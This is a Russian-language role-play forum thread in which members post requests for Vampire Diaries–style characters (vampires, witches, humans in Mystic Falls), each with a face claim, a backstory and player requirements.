Наверное, это я, неосторожно пользуясь силами, навлекла бурю на наш дом. Однажды, семь лет назад, ночью, когда мы с мамой сидели в семейной библиотеке, а отец чинил камин, в наш дом ворвались какие-то люди. Мама наскоро спрятала меня в какой-то шкаф, дабы я не попалась. И храбро встала защищать нас всех. Но отца убили первым и что-то дало трещину, она не смогла управлять силами. И ее схватили и подожгли подол красивого длинного платья. Я вырвалась из шкафа, рыдая. И если бы не что-то или кто-то, я бы умерла той ночью.
В эту секунду в наш дом ворватись две тени, я не видела кто это, так быстро они двигались. Но мужчины, что ворвались в наш дом, кричали и падали замертво. А затем все прекратилось. Только маму эти две тени спасти не успели – она уже умерла. Когда они остановились, я поняла, что это – парень и девушка, совсем ещё юная, но старше меня. Мне было всего пятнадцать и я разразилась рыданиями. А они оба обняли меня. И внушили мне успокоиться и не бояться.
Это были Николас и Кассандра Линдберг – брат и сестра из шестнадцатого века. Оказалось – они – вампиры. И они связаны с моей семьей: мои предки когда-то изготовили им амулеты, чтобы они могли находиться на солнце. Я не верила своим ушам. Три года назад я узнала о том, что я ведьма. А теперь передо мной стоят два вампира, прям как в фильме ужасов. И они только что спасли мне жизнь.
Мне некуда было идти. Все мои родственники жили на другом конце Франции, а добираться туда одной – дело не из легких. И я согласилась остаться с вампирами. Впрочем, они были очень добрыми и веселыми. Они мне даже понравились. И мы отправились путешествовать. Они помогали мне найти других ведьм, чтобы они помогли мне научиться совладать со способностями. Знаете, чистые ведьмы всегда помогают друг другу. А я же, до сих пор, не обратилась к темной стороне. Поэтому, меня обучили всему.
А потом Кассандра и Николас рассказали мне, где-то года через два, что им необходимо обновить амулеты. Что если этого не сделать – старые потеряют силу, что в них вложили мои предки, а прошло уже века четыре, и они сгорят на солнце. А я, знаете, сильно к ним привязалась. И я не хотела потерять их. Посему, я обратилась к духам предков, чтобы они раскрыли мне секрет изготовления. Знаете, предки были рады видеть этих двоих. Это ещё раз убедило меня в правильности выбора. Мы побывали во всех странах Европы, даже в Монако, где встретили саму наследницу трона, Шарлотту Казираги. В нашей семье вы знаете ее под именем Шарлотта Линдберг. Она была возлюбленной Николаса. Я не знала о его любимых до этого, посему считала Шарлотту его первой настоящей любовью и искренне радовалась за них. Девушка не воспылала ко мне любовью, но зато я влюбилась в нее, не в прямом смысле, без остатка. Она была для меня идеалом женщины. И я, семнадцатилетняя девушка, стала комплексовать. Но все равно изготовила ей кольцо.
А потом мы стали вместе путешествовать. А год назад, когда мне исполнился двадцать один год, мы отправились в Мистик Фоллс. Из-за того, что Николас получил какое-то письмо. О какой-то девушке. Кассандра сказала, что она – любовь всей его жизни, а Шарлотта после этого разбила три мои любимые вазы. И я все поняла – любовь. Вот, что движет Николасом. И я стала ещё лучше к нему относиться.
Правда полгода назад произошло кое-что. Кассандра и Шарлотта ушли из дома – сестра Николаса потащила Казираги куда-то в город – на какой-то местный праздник. Надо сказать – праздников в Мистик Фоллс – хоть отбавляй. Но дело не в этом. Я вновь позировала Николасу. Обнаженной. Я давно перестала стесняться этого : он талантливо рисует, мне было совершенно не стыдно предстать перед ним в таком виде. Мы пили при этом вино. И знаете, я совсем забыла, что я – все-таки существо человеческое. И я захмелела. А его я знала давно. И он оставался таким же молодым и привлекательным. Я поддалась нахлынувшим чувствам. Меня ведь никто до этого не любил. Да и я, признаюсь, никого не любила. Правда и Николаса я не любила, тоже. Оказалось, настоящая любовь пришла ко мне позднее.
Месяц назад я столкнулась на местной ярмарке с молодым человеком. Я как раз пошла туда купить что-нибудь в дом. Не скрою – я часто веду себя как заправская мать семейства. И буквально столкнулась лоб в лоб с молодым человеком. Скажу честно – он – не красавец. Но я сразу почувствовала сверхъестественную энергетику. Мне стало интересно. А он оказался до крайности милым. Знаете, по-моему, я – полюбила. Мы провели вместе уже не один день, не одну ночь. И я готова уйти с ним на край света. Если бы не Николас. Я чувствую, что не имею права оставить его без защиты. Его и Кассандру с Шарлоттой. Я просто не могу. И даже Ласло не может мне помочь, и внушить мне, что я проживу без этого всего.

✤ дополнительно: активность, понимание персонажа, легкость в общении, готовность много играть

Отредактировано Laszlo Vadash (2012-08-07 20:51:11)

0

12

http://24.media.tumblr.com/tumblr_lqivgevF3e1qbzdxyo1_500.gif

✤ внешность: Colin Farell
✤ предполагаемые имя, фамилия: Вадаш Янош / Vadash Janos
✤ принадлежность, возраст: ведьмак, 30 лет
✤ краткая справка: Из жизни Яноша. В баре зажигает:

наслаждайтесь

Хей, цыпочка, привет, я – Янош. Да. Я мать твою венгр. И да, вообще меня бесит как вы, американцы, не можете произнести мое долбаное имя. Оно ведь такое простое: Я-НОШ. Да нет, что-то у тебя не слишком выходит повторять за мной. Кажется, твоими губами получится только отсосать у меня.
Да, я мужлан. Я ущербный, дерзкий психопат, как ты говоришь. Я вообще не вписываюсь в местную статистику. Парень без статистики, вот как я себя называю. Я вообще мужчина без пристанища – твоя долбаная Америка никогда не станет мне таким домом, каким мне был Дьёр.
Да, родился я скорее в аппендиксе мира, в Венрии. Никто даже наш язык толком не понимает. Все, твою мать, смеются. А я бы посмотрел на вас, если бы вы были из Дьёра. Мне вообще как-то не кстати слушать все ваши высказывания о Венгрии. Вы – американцы, - тупые, и я тут только из-за родного брата.
Ты спрашиваешь что за брат? Забей, он не красивее меня. Я бы сказал не такой эффектный. Но - таинственный, никогда не понимал его манеры сидеть на шумной вечеринке в углу и посасывать виски. Знаешь, что я делал? Я лизался с кошечками и пробовал все, что только можно попробовать. А он сидел в уголке и рассматривал нас. Чтобы потом нарисовать. Кстати, у него это классно получается – у меня руки совсем из задницы – так, что я действительно горжусь им, что бы я не говорил.
Я вообще, когда был маленьким, когда мама была беременна, боялся, что эта новая игрушка родителей, Ласло – отвлечет их от меня. Думал – если что приду и поколочу его. Ан-нет. Знаешь, он был моим спасательным кругом. У него с детства был дар убеждения. Он умел обратить все в нашу пользу. Кстати, бескорыстно.
Бармен, повторить!
Я пьян? Не-е-е-ет, ты что! Я из Дьера. Я умею пить. Так вот, мы росли с моим братом вместе. Душа в душу, я бы сказал. Все проказы совершали вместе. Домашнее задание тоже вместе делали. Да, я прилежно учился, хоть и посещал все вечеринки города. Почему? Киска, я хотел стать крутым финансистом, очнись. Это мечта всех парней из маленьких городков из клоаки мира. Ну да, я – не утонченный. И что? Нет. Сиди тут. Слушай.
И вот так мы как-то и росли. Я к двадцати годам окончил с отличием школу и поступил в какой-то университет у нас, даже не вспомню сейчас названия. Так вот, я был на какой-то вечеринке, когда мне позвонили из полиции. Да, отец, конечно, частенько откупал меня, но звонить чтобы поздравить меня с успешным бизнес-планом, они явно не будут. И да, я был прав.
Мои предки погибли в автокатастрофе. Точнее машина просто взорвалась и превратилась в долбаную кучу железа, обгоревшего железа, покрытого жиром из их тел. Жуткий запах, скажу я вам. Опознали их за меня по записям стоматологов. Ничего другого от них не осталось. Мерзкое зрелище, кстати. Ты бы вот выдержала такое? Вот и я не выдержал. Меня прям там и вывернуло наизнанку.
Но брат мой выжил. Никто так и не понял, как он оказался на другой стороне дороги. Ну, главное он жив. Правда в госпитале сказали, что зрение он потеряет в течение пяти лет. И посоветовали вот прям тут клинику, представляешь, у вас в Мистик Фоллс. Ну, а что делать. Он делал для меня столько в детстве, что я бросился паковать чемоданы.
Эти бегания по врачам, они так бесят, честно. Я просто вскрывался. Но делал это для Ласло. А зрение его не улучшалось. Хотя, должен признать, оно осталось на том же уровне. Это радовало. Но представь, киска, мое удивление, когда он процитировал мне оставленную на обеденном столе  и только что прочитанную газету. Прикинь! Мой брат знал, что там написано, хотя не мог прочитать и слова.
А знаешь в чем дело? Мы – ведьмы мужского пола. Как там это называется. О, ведьмаки! Да хватит ржать как лошадь. Смотри, видишь, как я потушил свечу? Вот, не зачем смеяться надо мной. Так вот. Мы происходим из древнего рода венгерских колдунов. Там все вдруг решили, что пользоваться магией незачем и перестали учить детей. Поэтому способности и проявляются черт знает когда. У меня вот в двадцать пять проявились. У брата почти в то же время. Кстати, э то круто.
Правда возник тут у нас один вампир на пороге. И объяснял нам все через порог. Буквально. Никлаус. Самый древний. Первородный. Я даже думал запустить в него пару каких-нибудь энерго-шаров, но остановился. Потому, что то, что он нам поведал – заинтересовало меня. Брат мой отказался от сотрудничества с Клаусом. Но я.
Я-то  стал ещё тем  шпионом. Я затем сам явился к первородному домой и предложил свои услуги. Брат, кстати, так об этом и не знает. Ну что ты смеешься? Есть ещё в Мистик Фоллс вампиры. И я не пьяный придурок. Ну и гуляй. А я вот скоро попрошу Никлауса меня обратить и выпью твою кровь, блондинистая стерва.

✤ дополнительно: активность, понимание персонажа (дерзкий ведьмак 30ти лет, что пользуется силой постоянно, кстати, он попросит Клауса его обратить, так что потом он станет вампиром), легкость в общении, готовность много играть

Отредактировано Laszlo Vadash (2012-08-07 20:54:11)

0

13

ЗАНЯТА

ВНОВЬ ОТКРЫТА КАНДИДАТУРА, ПРОФИЛЬ ПЕРЕДАЕТСЯ:

СЕСТРА:

http://25.media.tumblr.com/tumblr_m43azjKCl01ql4nnfo1_500.gif
✤ внешность: Emma Watson
✤ предполагаемые имя, фамилия: Cassandra Lindberg - Кассандра Линдберг
✤ принадлежность, возраст: вампир, выглядит на 18, на самом деле ей 430 лет
✤ краткая справка: Взбалмошная, легкомысленная особа, не выносит рутины, за словом в карман не полезет, азартна, ее лучше не брать «на слабо», подвержена резким сменам настроения, легко заводит друзей и с той же легкостью находит неприятности на свою пятую точку.
Она не умеет извиняться, но просит прощение нежностью, которой хоть отбавляй. С хорошим чувством юмора. Непосредственная. Не нужно искать сакраментального смысла в ее словах - его там просто нет, она говорит только то, что думает. Иногда об этом жалеет.
Она быстро загорается чем-то, и так же быстро остывает. Она часто очаровывается людьми и так же часто разочаровывается в них. Почему? Она все-таки стремится к идеалу - в ее понимании. Люди, окружающие ее, должны соответствовать ее представлениям.
Она любит праздники, яркие цвета и мягкие игрушки. Хитрая и наивная, подвижная и хрупкая, резкая и нежная. Она упряма, уперта и горда.
Она хочет всего и сразу.
Она любит иногда посидеть в одиночестве, рассматривать фотографии. Фотографии - это ее страсть. Она любит черно-белое фото и с удовольствием фотографирует все, что можно и нельзя.
Николас обратил ее в возрасте 17ти лет, когда она умирала от гриппа. Сестра следует за ним по пятам, он охраняет ее. Они очень сильно любят друг друга и Николас никогда не даст Кэсси в обиду. Приехав в прошлом году с братом в Мистик Фоллс, девчонка поступила в один класс  с Еленой Гилберт и остальными. Она уже год одноклассница главных героев. Распознала в Сальваторе и Форбс вампиров, о чем сообщила брату. Пока же семья Линберг в дела героев не лезет, стараясь жить мирно. Сандра питается донорской кровью.
✤ дополнительно: активность, понимание персонажа, легкость в общении, готовность много играть

Отредактировано Nicholas Lindberg (2012-09-08 14:48:08)

0

14

http://25.media.tumblr.com/tumblr_ma0jijpYn21rz11heo1_500.gif
✤ внешность: Logan Lerman or Evan Peters (Я не сильно на них настаиваю, но в анкете описала, что он был молод, так что исходите из этого. И если захотите сменить, то прошу оповестить меня, об этом, в гостевой.)
✤ предполагаемые имя, фамилия: Имя: Фирс | Firs (это может быть сокращение, но лишь такое)
Фамилия: на ваш вкус и цвет.
✤ принадлежность, возраст: вампир, выглядит: 20-24, реальный: можете выбрать сами, но старше 200 лет точно.
✤ краткая справка:
Совесть и малодушие - это на самом деле одно и то же. Просто "совесть" звучит респектабельнее. (с)
Фирс многогранная, интересная и одновременно пугающая личность. В его глазах всегда было что-то отстраненное, что-то пугающее. Так что друзей у него было отнюдь не много. Да и девушек его скверный характер отталкивал. Этот мужчина замкнутый и тихий, но любит пофилософствовать. Злопамятен, но не вспыльчив. Действительно предпочитает подавать блюдо, под названием "месть" холодным. Да что там холодным, просто ледяным до ужаса. Расчётлив, изворотлив. Не обделён мозгами. Дедукция - это его конёк. Не раз был сравнён со знаменитым "Шерлоком Холмсом". И поверьте, это ему очень льстит. Любит, когда ему доверяют и слушаются его. Но из тени выходить не желает. Старается совершенно не привлекать внимания на свою персону. Он и сам не понимает, чего хочет от жизни. В основном ему просто скучно и тогда Фирс начинает себя развлекать. Причём весьма не простым способом.
Хладнокровен, даже жесток. Хотя может и пощадить, если посчитает это нужным или ему просто надоест. Редко прощает и просит прощения. Лишь у "избранных" и в таких же ситуациях. И то, навряд ли это будет искренне. Этот вампир не сговорчив, если убеждён в чём-то, то вы ни в жизнь не сможете вбить ему свою точку зрения. Легче или убить его или убиться самому. Любит врать, считает, что "ложь - это великолепная сказка, которую зачастую портят правдой."
Имеет кучу вредных привычек, но всегда выглядит презентабельно и даже соблазнительно. Очень сложно запечатлить мужчину в неподобающем виде. Серьёзен, почти всегда, но может и строить из себя весёлое вселенское добро. К слову, часто меняет маски. Всё написанное выше лишь настоящая сущность, кою знает лишь Констанс и ещё парочка душ из его свиты. Перед остальными же его облик непоколебимо идеальный. Вечно бодрый, дружелюбный, активный и т.д. по списку.
часть биографии, связанная с девушкой и их отношения остальная часть биографии на вас, всё же это Вам за него играть :з
Никогда не разговаривайте с неизвестными. (с)
Этих двоих никогда не связывало ничего особенного. Фирс использовал девушку, как игрушку. Когда хотел есть - не сдерживал себя, когда хотел любви - и подавно, а после просто стирал ей память и отпускал до следующего раза. Узнав бы она о его сущности раньше - непременно сбежала или, что ещё хуже, начитавшись подобной литературы, может совершила  попытку убийства этой нежити. Но всё обернулось иначе, парень специально, по началу, влюбил эту особу в себя, а после исчез на долгих 4 года, не стерев себя из памяти Конс. Девушка страдала, ну, а вампир развлекался на полную катушку, пока не попал в одну переделку, выбраться из которой, в одиночку, он не смог. Друзей не было, а по тому Фирс просто стал собирать свою свиту, которая служила бы ему и защитой и развлечением. По воле случая, оказавшись, вновь, в Мистик - Фоллсе, парень обращает, уже замужнюю даму и забирает её с собой. Странно, но Констанс не испытывала к нему ни ненависти, ни любви. Лишь восторг и интерес, ведь всё таки то, что она так любила в теории, оказалось правдой.  Через сотню лет, устав, от тирании и издёвок Фирса, Конс сбегает, что не остается не замеченным. Как парень относиться к ней, девушка не знала, но тем не менее оставаться подле него более не собиралась. Сейчас всё так же скрывается от Фирса, не желая вновь попадать под его или чьё либо ещё влияние.
✤ дополнительно:
http://noid.su/fu/ofcourse.gif от вас мне нужна лишь отдача о даа, отдайся мне полностью хд и частый онлайн по возможности :з

Отредактировано Constance M. Burge (2012-09-08 11:36:20)

0

15

http://24.media.tumblr.com/tumblr_m78jltXmVJ1qb8x20o1_500.gif

Еще

James McAvoy
http://24.media.tumblr.com/tumblr_ma7dsfBfhB1rzdmzdo1_500.gif
Taylor Kitsch
http://24.media.tumblr.com/tumblr_ma56t6ehox1rdvbv3o1_500.gif

✤ внешность: предложу наиболее интересные мне. Ben Foster, James McAvoy, Taylor Kitsch
✤ предполагаемые имя, фамилия: Christopher, Brian, Anthony.
Hunter, Sutton, Mitchell.
Фамилию соотносим с дочерью - какая у нее, такая и у вас. Если вы регистрируетесь раньше, то автоматически дочке ставим ту же фамилию, что выбрали вы.
✤ принадлежность, возраст: человек, 30-35 лет на выбор.
✤ краткая справка:
Вся та наивность, что была в тебе в первый день нашего знакомства, быстро улетучилась. С виду милый, ты оказался эгоистом в душе. Интересно, правда? Замкнутый в себе, погруженный в свои интересы, живущий по своим правилам и жутко разъяряющийся, когда твои планы не приводят к нужному результату. Твоя улыбка сводит с ума, а тяжелый взгляд отталкивает. Смешной, пытающийся наладить отношения и жутко нелепый в отношениях со своей дочерью. Кстати, как так получилось, что родилась Зузу? Неужели ты, воплощение обманчивости и фальши, когда-то любил?
За то время, что я живу в этом городе, мы стали ближе. Даже слишком, для каких-то пары месяцев. И если пока наши отношения крепко держатся на уровне дружбы, то неизвестно, что станет потом. Мы можем насмерть поссориться, а можем понять, что созданы друг для друга. Но до этого еще жить и жить, верно?..
✤ дополнительно:
Не ограничиваю ни в чем. Жизнь вашего персонажа описываете сами, я описала лишь ту часть, когда они были знакомы.
Не против кросспола) Буду рада идеям с вашей стороны. Если заинтересует роль, можете обратиться в гостевую за номером моей ICQ или никнеймом в скайпе.

http://media.tumblr.com/tumblr_ma1go8kN3l1r8jijx.gif ✤ внешность: Mackenzie Foy как вариант, можно предложить что-то свое;
✤ предполагаемые имя, фамилия: имя Zooey (не обсуждается), ласково Зузу.
Hunter, Sutton, Mitchell.
Фамилию соотносим с отцом - какая у него, такая и у вас. Если вы регистрируетесь раньше, то автоматически отцу ставим ту же фамилию, что выбрали вы.
✤ принадлежность, возраст: человек, 11-12 лет на выбор.
✤ краткая справка:
Кажется, ты – единственный ребенок на свете, которого я люблю так же, как и мою сестричку Шанталь. В тебе есть что-то от нее – и, возможно, это меня к тебе и притягивает. Нежность, доброта, детская шкодливость, такая теплая улыбка. С тобой, Зузу, я могу провести так много времени, забывшись о делах и проблемах.
✤ дополнительно:
Не ограничиваю ни в чем. Жизнь вашего персонажа описываете сами, я описала лишь ту часть, когда они были знакомы.
Буду рада идеям с вашей стороны. Если заинтересует роль, можете обратиться в гостевую за номером моей ICQ или никнеймом в скайпе.

Общее. Одна из встреч.

- Скажи мне, пожалуйста, когда ты в последний раз водил Зои куда-нибудь развлечься? – возмущенно проговорила Шевонн. Она взглянула на лицо Криса, на котором отобразилось недоумение. Он смущенно пожал плечами.
Шеви, вздохнув, покачала головой и цокнула языком. Ей никогда не нравилось отношение парня к своей дочери. Да, он воспитывал ее сам, и не знал, как нужно поступать с маленьким ребенком, но это же не повод, чтобы лишать ее развлечений!
- Значит, сегодня мы идем в парк аттракционов, - подумав с секунду, Шевонн довольно улыбнулась принятому ею решению. Она, наконец, заметила бегущую к ним девочку с красивыми длинными волосами и обворожительной улыбкой.
- Зои! – воскликнула она и, присев, распахнула руки в сторону для объятий. Девочка подбежала и крепко обняла Морель, после чего обняла отца. Ее щечки чуть порозовели от быстрого бега. Крис приподнял девчушку над землей и пару раз прокрутил, от чего та радостно засмеялась. Поставив дочь на землю, он поцеловал ее в щеку.
Шевонн всегда замечала изменения в характере друга, когда тот видел Зои. Девушке в голову невольно пришла мысль о матери Зои. Но тут Крис заговорил, и она отбросила рассуждения в сторону:
- Зузу, ты хочешь пойти с нами в парк аттракционов? – торжественно произнес он, глядя в глаза дочери. Та сильно удивилась, и дрожащим от волнения голосом вымолвила:
- Конечно, хочу!
- Тогда не стоит терять времени, - задорно воскликнула Шевонн. Зои оказалась посередине – Шеви держала ее за левую руку, а Крис за правую. Девочка радостно щебетала что-то о сегодняшнем дне. Шевонн Морель, улыбаясь ей,  думала о том, как здорово быть человеком и не задумываться о тех многих проблемах, о которых постоянно приходилось думать вампирам.

0

16

http://24.media.tumblr.com/tumblr_ma4kxoTzBl1rahcwqo1_500.gif

✤ внешность: Troian Bellisario
✤ предполагаемые имя, фамилия: на ваше усмотрение
✤ принадлежность, возраст: ведьма, 18 лет (один класс с Еленой Гилберт и остальными)
✤ краткая справка: Биографию я оставляю полностью вам.
По характеру ваша героиня должна подходить под это описание, далее пишите сами: Она - прекрасная актриса и завидная лгунья. Лицемерие для нее - отличный способ пробиться. Она любит нравиться всем, для чего идет на что угодно. Целеустремленная. Для достижения своей цели пойдет не только по головам впередиидущих, но и на край света. Хочется стать президентом класса? Она приложит все усилия, поверьте! Хочется влюбить в себя школьного учителя? Будет сделано, сэр! Истерична, если что-то идет не так, как ей хочется. Рвет и мечет, дома плачет в подушку от легких нервных срывов. В учебе прилежна, всегда выполняет домашние задания и пишет тесты на высший балл. Мечтает стать главным редактором местной газеты. Любит повеселиться с подружками, нередко умоляя барменов налить из под полы. Своей силой наслаждается и иногда пускает ее в ход для достижения цели.

История знакомства Ласло и вашей героини банальна: он - новый учитель изящных искусств, которые девушка просто обажает. Ей безумно нравится подход мистера Вадаша. Да и он сам кажется ей невероятно привлекательным. Спустя месяц девица понимает, что он ей сильно нравится. К тому же, из-за последних вечеринок у девушки немного падает средний балл за тесты, и ей срочно нужна протекция в учительском комитете. Девушка направшивается на дополнительные занятия с мистером Вадаш, на которых всячески старается привлечь его внимание сами понимаете в каком плане. Однако, Ласло, во-первых уже к тому моменту влюбленный в Клеманс Руж, "родственницу" одноклассницы девушки Кассандры Линдберг, да и к тому же человек очень правильный, будто бы не замечает попыток вашей героини. Отчего она решает испробовть на нем любовную магию. Но она и понятия не имеет о том, что ее преподаватель, ровно как и его девушка, принадлежат к старинным родам ведьм и могут легко дать отпор маленькой авантюристке.

✤ дополнительно: Обратите внимание, что никаких отношений между вашей героиней и Ласло не будет. Девушка спокойно может иметь и молодого человека, если захочет. Все, что она делает - скорее попытка защитить себя на выпускных экзаменах, но в то же время мужчина ей и вправду нравится. Хотелось бы видеть активного персонажа, который задержится здесь надолго. По всем вопросам - обращайтесь в админскую или же в лс (если зарегистрируете уже ник).

Отредактировано Laszlo Vadash (2012-09-12 13:29:36)

0

17

http://media.tumblr.com/tumblr_m3xnwrxhWv1rn435g.gif

✤ внешность: ventimiglia, milo обсуждаемо
✤ предполагаемые имя, фамилия: Nathan 'Nate' Dalgaard / Нейтан 'Нейт' Далгаард
✤ принадлежность, возраст: ведьмак; 32-37 y.o.
✤ краткая справка:
если любишь змею, привыкай поневоле к яду.
   Милый, помнишь ли ты мой последний звонок? Помнишь ли мое сбивчивое дыхание и тихий шепот в трубку, с просьбой спасти меня? Помнишь ли, как срывался посреди дня или ночи, находил меня и вытаскивал из очередной передряги, а в благодарность получал лишь язвительную улыбку и снисходительный поцелуй? Помнишь ли? А я знаю, что ты всегда хотел большего. Ты, такой холодный и неприступный, настоящий джентльмен - почему, почему ты влюбился в меня? Я ведь знаю, что каждую ночь, которую я провожу в объятиях нелюбимых мужчин, ты, собственник и ревнивец, изводишь себя этими пошлыми картинками, этими криками и стонами, которые рисует твоя фантазия. И ты снова и снова представляешь себя на их месте, представляешь, как срываешь горячие поцелуи с чуть влажных губ и как пальцы с острыми ноготками оставляют розовые царапины на твоей спине. И тебя убивает то, что это - всего лишь фантазии, но фантазии, происходящие наяву, просто без твоего участия.
   Я называю тебя своим мальчиком, своим любимым ведьмаком, а потом звонко смеюсь и вижу невыносимую боль, что сияет в твоих глазах. Ты боишься меня, ты хочешь меня, ты любишь меня; а я довожу тебя до изнеможения, целуя в шею и лаская руками, но не переходя грань дозволенного. В твоих глазах уже сияет неконтролируемая страсть, а я... я всегда ухожу именно в этот момент.
   Ты уже ненавидишь меня. Каждую ночь я дарю себя другим мужчинам, но не тебе. Кажется, если бы я продавалась, ты бы отдал все богатства и собственную жизнь, лишь бы получить желаемое, но, увы, свой выбор я делаю сама. И, знаю, однажды ты сорвешься: просто схватишь меня за волосы и заставишь стать своей. И я стану. Стану послушной девочкой, которая днем по-прежнему будет дарить себя всем, а ночью принадлежать лишь тебе одному. Просто попробуй, прояви свою силу. И пусть я зверь, чудовище, настоящая дрянь... но я по-прежнему всего лишь слабая женщина.
✤ дополнительно:
ХОЧУ СТРАСТИ :З и персонального сильного ведьмака.
эмоциональные посты приветствуются. не против кросспола, но не говорите об этом сразу. самое главное: желание самостоятельно развивать персонажа. я, конечно, буду играть с вами и уделять вам много внимания, но мир не только вокруг меня вертится, и продумать все за вас я не в силах. с:
с графикой помогу.

http://24.media.tumblr.com/tumblr_m95x9vldth1rbk3fwo1_500.gif

✤ внешность: thomas, antonia не обсуждаемо
✤ предполагаемые имя, фамилия: Lauren Alisha Dalgaard / Лорен Алиша Далгаард
✤ принадлежность, возраст: ведьма, но свои способности не развивает; 20-25 y.o.
✤ краткая справка:
   Когда-то нас познакомил Нейтан - твой сводный брат по отцу или, может, по матери. Мы сидели в баре и пили текилу, а ты танцевала на барной стойке. Такая яркая, сумасшедшая, беспринципная и бессовестная, всегда делающая только то, что хочется - настоящая противоположность брата - разве ты могла не привлечь моего внимания? И я искренне не понимаю, почему Нейт не хотел нас знакомить: боялся, что я плохо на тебя повлияю (хотя куда уж хуже) или, может, что ты плохо повлияешь на меня (ха-ха)?
   Нет, мы не лучшие подруги, просто иногда совершаем совместные вылазки по барам, клубам, ресторанам... Твоя пошлость и раскованность забавляют меня, и иногда я даже извлекаю для себя что-то новенькое. Ты не знаешь, что я вампир, и тебе просто кажется, что ты нашла родственную душу - но если кому-то придет в голову нас сравнивать, то я окажусь гораздо невиннее.
   Я буду рядом, пока ты прожигаешь свою молодость, пока Нейтан будет нестись сломя голову, чтобы вытащить нас из того, во что мы вляпались в очередной раз (да, я могла бы решать все эти проблемы кровавым образом, но зачем открывать тебе свою сущность, когда можно прикинуться слабой девушкой и поиграть на нервах твоего брата), и пока ты не сделаешь осечку: просто я не люблю, когда все идет не так, как хочу я.
✤ дополнительно:
от вас требуется желание самостоятельно развивать персонажа, то бишь не складывать это на мои плечи. у нас будет несколько совместных отыгрышей, а если появится Нейтан - то их станет еще больше. :з люблю красивые посты с эмоциями, где много букв, да и против водички я ничего не имею. что касается характера персонажа: пошлая, развратная, беспринципная девушка, которая любит себя и свое тело, а также не задумывается о чувствах других людей и об их мнении. но это не значит, что нужно делать ее бесчувственным камнем, не умеющим любить и не испытывающим никаких человеческих чувств если вы смотрели отбросы и знакомы с персонажем антонии, то это вообще шикарно :з
с графикой помогу.

+1

18

http://25.media.tumblr.com/tumblr_mah5pvVgop1rgjo9do1_500.gif

✤ внешность: Darren Criss, найдете кого-нибудь милее - обсудим, но не думаю что это у вас получится С:
✤ предполагаемые имя, фамилия: Anthony Laskey | Энтони Лэски, имя вообще не принципиально
✤ принадлежность, возраст: вампир, 25-27 | 580
✤ краткая справка: м, о, й. Мой. Три буквы, минимальная смысловая нагрузка, все четко, ясно и не требует объяснений. Не собираюсь тебя делить. Никогда. Ни с кем.
Помнишь, кто единственный сочувствовал моей горькой доле, кто единственный встал против ненавистного жениха, кто единственный понимал мое невыносимое положение с отвратительным мужем и тремя детьми? Кто единственный любил и поддерживал меня, не обращая внимания на мои поступки, мои горячие слова, необдуманные действия, которые я совершала под давлением эмоций? Кому первому я открыла свою сущность и кто согласился разделить со мной вечность?..
Мой милый брат, ты - единственный, кто остался на одной стороне со мной, принимая меня такой, какая я есть - психованной, никчемной и фанатичной, жаждущей всеобщего признания и полного повиновения. Я никогда не признавалась тебе раньше, как люблю тебя, как мне не хватает тебя, как одинокие осенние ночи навевают на меня ностальгию прошлых лет, где мы, совсем еще юные и счастливые, загадывали на будущее, глядя на светлое отражение  луны в Темзе. Ты приехал, ты разыскал меня в этой забытой богом дыре. А, может, ну к черту все, уедем отсюда во Францию и начнем со старого - нового листа? Я чувствую, я вижу по твоим лучистым глазам, что ты не в восторге от моего плана по поиску Никлауса, но станешь ли ты разубеждать меня или в очередной раз поддашься на капризы своей_маленькой_сестренки? Как бы то не было, я вновь попытаюсь склонить тебя на свою сторону, а после, когда все отведают моей мести, мы снова воссоединимся и улетим отсюда прочь.
✤ дополнительно: все просто:
;чью сторону примет персонаж - решайте сами, я буду рада любому повороту событий, вот правда
;как видите, в пункте справки я расписала отношения, характер же оставляю на вас - ведь отыгрывать персонажа вам
;кросспол только при условии его идеального отыгрыша
;посты-простыни меня пугают хд
;если вы заядлый флудерас - я вас уже люблю)
;я вас жду <3

+1

19

http://25.media.tumblr.com/tumblr_mahu5kR23g1qhmyduo1_500.gif
✤ внешность: Michael Fassbender (можно поменять, посоветовавшись со мной)
✤ предполагаемые имя, фамилия: James Hamilton - Джеймс Хэмилтон. Все можно изменить, ни в чем не ограничиваю.
✤ принадлежность, возраст: вампир; выглядит на 35-37, настоящий от 200 до 350.
✤ краткая справка:

Honest to God I'll break your heart
Tear you to pieces and rip you apart
Музыка вдохновения:
Kevin Rudolf – In The City

Every day I'm a star in the city
Walk the streets like a loaded gun
All the time got my shine lookin pretty
Everybody now turn me on

Ты сильный характером, переживший множество проблем и сумевший их преодолеть. Обаятельный, умный, красивый, умеющий подобрать ключ к любому сердцу – ты всегда пользовался огромной популярностью. Вежливый, элегантный, всегда одетый с иголочки.
Немного самовлюбленный и самоуверенный, капельку эгоистичный. В тебе сочетаются такие черты характера как спокойствие, способность к самоанализу и злопамятность. Да, ты помнишь все то плохое, что сделали тебе другие. Прожив на свете немало лет, ты стал рассчитывать свою жизнь на несколько шагов вперед. Ты просто не можешь позволить себе ошибиться.

Музыка вдохновения:
Falling in Reverse – The Drug In Me Is You

Heard a knock upon my door the other day
I opened it to find death staring in my face
the feel of mortal stalking still reverberates
everywhere I go I drag the coffin just in case

Ты родился в Лондоне, в очень богатой и известной семье. Воспитанный в самых лучших традициях того времени, прекрасно знающий английский, французский и испанский языки, ты был надеждой своих родителей и завидным женихом.
Ты проводил все свои молодые годы, не задумываясь о будущем. У тебя были деньги, связи, образование – перед тобой были открыты все пути. Но все изменилось, совершенно не в ту сторону, в которую ты хотел. Тебя превратили в вампира. Насильно, ведь ты совершенно не хотел этого.
Тебе пришлось покинуть родной дом на первое время, и ты отправился путешествовать. Тебе помогала та девушка, которая тебя и обратила, именно благодаря ее помощи ты мог контролировать себя. Но потом ее убили, а тебе пришлось скрываться. Ты никогда и никого не посвящаешь в свои приключения, но я то знаю, что в глубине души ты все их помнишь.

Музыка вдохновения:
Pete And The Pirates - Blood Gets Thin

Here she comes; she's cool like sin,
I can feel my blood get thin.
Here she comes; she'll suck me in,
Take a deep breath and begin.

Мы с тобой познакомились в Аризоне. Я не знаю даже, сколько времени мы знакомы и что делали вместе, но могу сказать, что я впервые радовалась, проводя время с тобой. Все переживания моей сестры действовали и на меня, а рядом с тобой все невзгоды забывались.
Ты всегда ждал меня под окнами моего дома, и каждый раз приносил букет моих любимых орхидей, или же роз. Мы проводили вместе так много времени, что расставаться было невозможно. Когда я и Шанталь уезжали в Мистик Фоллс, мне казалось, что этого расставания я пережить не смогу. Я оставила тебе свой телефонный номер, и ты сказал, что непременно позвонишь.
